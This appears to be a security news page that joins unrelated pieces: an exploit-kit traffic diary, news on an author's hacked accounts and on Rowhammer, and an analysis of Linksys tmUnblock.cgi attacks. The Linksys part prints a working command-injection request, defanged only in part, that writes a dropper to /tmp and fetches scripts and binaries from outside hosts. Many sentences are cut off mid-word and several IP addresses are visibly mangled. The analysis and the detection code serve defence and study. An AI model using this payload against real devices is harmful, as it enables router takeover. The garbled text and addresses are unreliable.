Information Security News
About two weeks ago, Nuclear exploit kit (EK) changed its URL patterns. Now it looks a bit like Angler EK. Kafeine originally announced the change on 2015-07-21, and we collected examples the next day.
Here's how Nuclear EK looked on
Now that we're into August 2015, URL patterns for Nuclear EK have altered again. These changes are similar to what we've seen with Angler EK since June 2015. They're not the same URL patterns as Angler, but the changes are similar.
In today's diary, we examine Nuclear EK traffic as of Tuesday, 2015-08-04. In this example, the EK delivered Troldesh ransomware, which is similar to a previous infection I published earlier this year in April 2015.
First, let's see how the 2015-08-04 traffic from a compromised website led to Nuclear EK.
From a compromised web site to the EK
I viewed the compromised website by getting to it through a Bing search, which is my preferred method for generating EK traffic. Google had already identified the site as potentially malicious and wouldn't
What's the easiest way to deobfuscate the script? Copy and paste the script into its own HTML file, make sure you
Open the resulting web page in a browser, and you should see an alert showing the deobfuscated script. Do this on an isolated analysis host, since any part of the script you have not neutralized will still execute in the browser. From the above example, we find a hidden iframe that goes to mobi-avto.ru.
With any EK, this all happens behind the scenes. The average user won't know what happened until it's too late. With ransomware, users will realize something
Shown above: The infected host's desktop after the Troldesh ransomware infection.
A look at the Nuclear EK traffic
On 2015-07-21 when Nuclear changed, each GET request from the EK started with search?q=. URL patterns remained that way through at least 2015-07-30. A few days later, the landing page URL still contains search?q=. However, the other URLs, for the Flash exploit and the payload, use different words. They also follow a different pattern after the question mark (?) up to the equal sign (=). Below shows our example of
In the 2015-08-04 traffic, Nuclear EK's landing page has some text before the initial HTML tag. This is something we hadn't
Except for the change in the URL pattern, this HTTP GET request for the EK's Flash exploit is similar to what we
Nuclear EK still uses an ASCII string to XOR the payload binary. This started with Nuclear's previous change of URL patterns back in December 2014, and it remains the EK's
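As an added example (my code, not anything from the diary, which does not reproduce Nuclear's key or payload), the Python below shows the two things an analyst does with such a payload: decode it once the ASCII key is known, and recover the key itself from the captured blob by XORing it against the bytes a Windows executable is known to start with. The key, the header bytes used as the crib, and the synthetic payload are all constructed for the example.

```python
from typing import Optional

# The first 60 bytes of a typical MSVC-linked Windows executable: the "MZ" magic,
# a fixed DOS header, and 32 zero bytes just before e_lfanew (offset 0x3c).
# Other linkers produce different headers, so this is a heuristic crib.
TYPICAL_DOS_HEADER = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 32
)
DOS_STUB_TEXT = b"This program cannot be run in DOS mode."


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(encrypted: bytes, known_prefix: bytes = TYPICAL_DOS_HEADER) -> Optional[bytes]:
    """Recover a repeating printable-ASCII key, assuming the plaintext starts
    with known_prefix. Ciphertext XOR known plaintext is the key stream; the key
    is its shortest period. At least two full repetitions must fit inside the
    crib, so keys longer than len(known_prefix) // 2 are not recovered here."""
    n = min(len(encrypted), len(known_prefix))
    stream = xor_with_key(encrypted[:n], known_prefix[:n])
    for period in range(1, n // 2 + 1):
        candidate = stream[:period]
        if all(stream[i] == candidate[i % period] for i in range(n)) and all(
            32 <= c < 127 for c in candidate
        ):
            return candidate
    return None


def looks_like_pe(data: bytes) -> bool:
    """Sanity check after decoding: MZ magic and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_payload(encrypted: bytes) -> Optional[bytes]:
    """Recover the key, decrypt, and return the binary only if it looks like a PE."""
    key = recover_key(encrypted)
    if key is None:
        return None
    decoded = xor_with_key(encrypted, key)
    return decoded if looks_like_pe(decoded) else None


# --- constructed sample: a fake PE encrypted with a constructed key -------------
SAMPLE_KEY = b"ExampleKey2015!!"  # constructed for this example, not Nuclear's key


def build_fake_payload() -> bytes:
    e_lfanew = 0x80
    header = TYPICAL_DOS_HEADER + e_lfanew.to_bytes(4, "little")   # 64-byte DOS header
    stub = DOS_STUB_TEXT.ljust(e_lfanew - len(header), b"\x00")    # pad to e_lfanew
    return header + stub + b"PE\x00\x00" + b"\x00" * 60            # minimal PE signature


SAMPLE_ENCRYPTED = xor_with_key(build_fake_payload(), SAMPLE_KEY)

if __name__ == "__main__":
    print("recovered key:", recover_key(SAMPLE_ENCRYPTED))
    decoded = decode_payload(SAMPLE_ENCRYPTED)
    print("decoded payload looks like a PE:", decoded is not None)
```

The DOS header is such a good crib because it contains a long run of zero bytes, and a zero plaintext byte hands you the key byte directly (x XOR 0 = x). If recover_key returns None, the binary was linked with a different header or the key is longer than half the crib; a longer crib (the DOS stub text at its usual offset) is the next thing to try.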
Additional information from the infected host
Filtering the traffic in Wireshark, we see SSL activity to 126.96.36.199 over port 443 and 188.8.131.52 over port 995 (the standard POP3-over-TLS port). Although this traffic is related to the Troldesh ransomware, those IP addresses are not inherently malicious.
The README text files from the desktop were identical.
Hey, Google. Someone is using Gmail accounts for nefarious purposes. Bet you haven't seen that before! Ah, free services... A cyber-criminal's delight!
In recent months, we've seen a lot of ransomware from EK traffic. This has been primarily (but not limited to) Angler, Magnitude, and Nuclear EK. Most of the ransomware has been CryptoWall 3.0, but every once in a while, we'll see something like AlphaCrypt/TeslaCrypt or Troldesh. We'll continue to monitor EK traffic and post any significant changes.
A pcap of the 2015-08-04 Nuclear EK infection traffic is available at:
A zip file of the associated malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
Andy Weir is the creator of Mark Watney, a fictional astronaut who can solve any problem the harsh environment of Mars throws his way.
But Weir, author of The Martian, ran into a tricky problem on Earth this week when his e-mail and Twitter accounts were hacked. The culprit, he says, was a hacker who reset the password for his Comcast.net e-mail account by calling Comcast and pretending to be him. Comcast let the hacker take control of his e-mail account after asking "security questions" for which the answers were easy to find, according to Weir.
"Well I got hacked," Weir wrote on Facebook last night. "Someone compromised my e-mail account and twitter account. I don't know how they got the password. My guess is they socially engineered a password reset on my e-mail account, and they used that to do a password reset on Twitter. They also set up an e-mail forward to an account they control, so even after I changed my e-mail password they were still getting my e-mails until I found that. Whee."
In March, researchers revealed one of the more impressive if slightly esoteric hacks in recent memory: an attack (now commonly called Rowhammer) that exploited physical weaknesses in computer memory chips to hijack the operating system running on them. Now a separate research team has unveiled techniques that make the attack more practical by allowing hacked or malicious websites to carry it out against unsuspecting visitors.
The "bitflipping" attack exploits physical flaws in certain DDR3 chip modules. By repeatedly accessing specific memory locations millions of times per second, attackers can cause zeroes to change to ones and vice versa in nearby memory locations. These bitflips can make it possible for an untrusted application to gain nearly unfettered system privileges or to bypass security sandboxes designed to keep malicious code from accessing sensitive operating system resources. Early versions of the attack worked only by running special code that wasn't practical in website environments, making the weakness hard to exploit in large, drive-by-style campaigns.
Last year, we wrote about the Moon Worm, a bitcoin mining piece of malware that infected Linksys routers. Ever since then, I have seen lots and lots of hits to the vulnerable CGI script (tmUnblock.cgi). Two entries from my web server log on 2015-08-04, a GET probe followed one second later by the POST that carries the exploit:

184.108.40.206 - - [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 - -
220.127.116.11 - - [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 - -

The POST request, with its percent-encoded body:

POST /tmUnblock.cgi HTTP/1.1
Host: [server ip address]:8080

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74 %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74 %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74 %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72 %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63 %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68 %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73 %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73 %68%60

URL-decoded, the body reads as follows (the & separators between the form fields are not shown):

submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > irk1.sh;echo "wget -O irk2.sh hxxp://109.206.177.16/ferry/rev12.sh" >> irk1.sh;echo "chmod +x irk2.sh" >> irk1.sh;echo "./irk2.sh" >> irk1.sh;chmod +x irk1.sh;./irk1.sh`StartEPI=1

The injection lives entirely in the ttcp_ip field: the CGI hands that value to a shell, and the backticks make the shell run the attacker's commands, which write a dropper script to /tmp and execute it.
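As an added example (my code, not anything from the diary), here is a small Python script that turns a captured request like the one above into something you can act on: it percent-decodes the body exactly as shown (whitespace from line wrapping removed), pulls the injected command out of the ttcp_ip field, lists the shell commands and download URLs in it, and flags tmUnblock.cgi requests in common/combined-format web server logs. The body and the first two log lines are the ones shown above; the third log line is constructed. Because the & separators between form fields are not present in the body as shown, the extraction keys on the field name and the backticks rather than on form parsing.

```python
import re
from urllib.parse import unquote

# The percent-encoded POST body as captured above (the spaces come from line wrapping).
CAPTURED_BODY = (
    "%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e"
    " %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74"
    " %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74"
    " %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e"
    " %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74"
    " %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72"
    " %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63"
    " %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68"
    " %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73"
    " %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73"
    " %68%60"
)


def decode_body(body: str) -> str:
    """Drop wrapping whitespace, then percent-decode."""
    return unquote("".join(body.split()))


# ttcp_ip is passed to a shell by the vulnerable CGI, so anything the attacker
# places between backticks is executed as a command.
INJECTION_RE = re.compile(r"ttcp_ip=[^`]*`([^`]*)`")


def extract_injected_command(decoded_body: str):
    m = INJECTION_RE.search(decoded_body)
    return m.group(1) if m else None


def split_commands(command: str):
    """Break a ';'-separated shell one-liner into its individual commands."""
    return [part.strip() for part in command.split(";") if part.strip()]


URL_RE = re.compile(r"https?://[^\s\"'`]+")


def download_urls(command: str):
    """Second-stage URLs worth blocking or pulling into a sandbox."""
    return URL_RE.findall(command)


# Common/combined log format. The quotes around the request line are optional
# because they are absent from the log excerpt above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "?(?P<method>[A-Z]+) (?P<path>\S+)'
)


def tmunblock_hits(log_lines):
    """Return (client_ip, method) for every request to /tmUnblock.cgi."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("path").split("?")[0] == "/tmUnblock.cgi":
            hits.append((m.group("ip"), m.group("method")))
    return hits


SAMPLE_LOG = [
    # the two entries shown above
    "184.108.40.206 - - [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 - -",
    "220.127.116.11 - - [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 - -",
    # constructed benign entry (documentation address range)
    '198.51.100.7 - - [04/Aug/2015:10:04:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    decoded = decode_body(CAPTURED_BODY)
    print(decoded)
    cmd = extract_injected_command(decoded)
    for step in split_commands(cmd):
        print("  ", step)
    print("download URLs:", download_urls(cmd))
    print("tmUnblock.cgi hits:", tmunblock_hits(SAMPLE_LOG))
```

The log filter keys only on the path, so both the GET probe and the POST exploit show up, which is what you want for a first pass; anything in the hit list that was answered with a 200 on a real Linksys device deserves a closer look at the POST body.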
Unlike for the Moon worm, the additional malware is not pulled from the host sending the exploit. The irk2.sh / rev12.sh script:

#!/bin/sh
wget -O .nttpd hxxp://22.214.171.124/ferry/.nttpd,14-le-t1
chmod +x .nttpd
wget -O .sox hxxp://126.96.36.199/ferry/.sox,14-le-t1
chmod +x .sox
The script downloads and runs two additional executables. I haven't done the full analysis yet (let me know if you want a copy and can

INPUT -p udp --dport 9999 -j DROP
INPUT -p tcp -m multiport --dport 80,8080 -j DROP
INPUT -s 188.8.131.52 -j ACCEPT
INPUT -s 184.108.40.206 -j ACCEPT
INPUT -s 220.127.116.11 -j ACCEPT
INPUT -s 18.104.22.168 -j ACCEPT
INPUT -s 22.214.171.124 -j ACCEPT
So it looks like the attacker is securing the router by blocking access to the web-based admin interface (ports 80 and 8080) and allowing access from very specific IP addresses, probably controlled by the attacker. Note that iptables stops at the first matching rule, so the attacker's own hosts keep access to the admin ports only if the ACCEPT rules sit ahead of the DROP rules in the chain (for example, because each rule is inserted at the head); the rule list alone does not show in which order they end up.
VirusTotal identifies .nttpd and .sox as a proxy (Avast, DrWeb). Reports for these binaries go back a few months.
The scripts also appear to modify name servers in resolv.conf, but so far I think they only set them to Google's name servers (126.96.36.199 and 188.8.131.52).
FWIW: per whois, 184.108.40.206 belongs to Serverel, a California company (but it is RIPE IP address space). [email protected] was notified.